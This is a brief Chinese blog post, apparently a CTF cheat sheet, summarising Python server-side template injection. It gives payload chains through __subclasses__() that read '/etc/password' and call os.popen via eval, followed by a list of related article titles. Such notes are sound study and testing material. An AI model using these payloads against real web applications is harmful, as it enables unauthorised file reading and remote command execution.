模板注入總結
1,常用命令
().__class__ 當前類
().__class__.__mro__ 當前類繼承了哪些類
().__class__.__mro__[-1].__subclasses__() object類的所有子類,具體就可以利用這個來找自己所需的類
比如有時第40為file函式,就可以通過
''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read() 來進行讀取檔案內容
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__ 檢視子類列表中第59個這個下面的內建函式,找到所需的
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()") 找到合適的函式後,可以利用如上所示來進行利用
更多可以參考:
https://www.cnblogs.com/vstar-o/p/13719889.html
相關文章
- ghost模板總結
- WPF 模板總結
- sql注入簡單總結SQL
- KPI總結模板:WhatKPI
- BUUCTF SSTI模板注入
- 模板注入&沙箱逃逸
- 線段樹模板總結
- .Net防sql注入的方法總結SQL
- 【總結】計算幾何模板
- Atitit opencv模板匹配attilax總結OpenCV
- 服務容器(自己總結)依賴注入依賴注入
- XXE外部實體注入漏洞總結
- 反射、註解與依賴注入總結反射依賴注入
- 前端資料模板引擎的總結前端
- 前端模板引擎的實現總結前端
- CTF-flask模板注入學習Flask
- Spring原始碼系列:依賴注入(四)-總結Spring原始碼依賴注入
- .Net Core中依賴注入服務使用總結依賴注入
- Android cmake命令總結以及指令碼模板Android指令碼
- 流行的後臺管理系統模板總結
- 工作總結ppt模板,瞭解一下!
- Link-Cut Tree(LCT) 模板總結 & 水題/模板題 動態樹
- 記一次堆疊注入拿shell的總結
- 服務端模板注入攻擊 (SSTI) 之淺析服務端
- 輕鬆做年終總結 WPS模板助您職場晉級
- spring常用的一些註解以及註解注入總結Spring
- halcon——缺陷檢測常用方法總結(模板匹配(定位)+差分)
- 動態多彩花瓣型商務彙報總結類PPT模板
- [WesternCTF2018]shrine(Jinja2模板注入)TF2
- 藍橋杯演算法模板常用套路及API等個人總結演算法API
- ES6新特性總結之解構賦值和字串模板賦值字串
- 資料結構模板資料結構
- 模板 - 資料結構資料結構
- 【模板】資料結構資料結構
- PHP安全、Sql防注入安全彙總PHPSQL
- mssql 手工注入流程小結SQL
- 【總結】大學生寒假社會實踐-社群志願服務模板
- WordPress模板常用函式彙總函式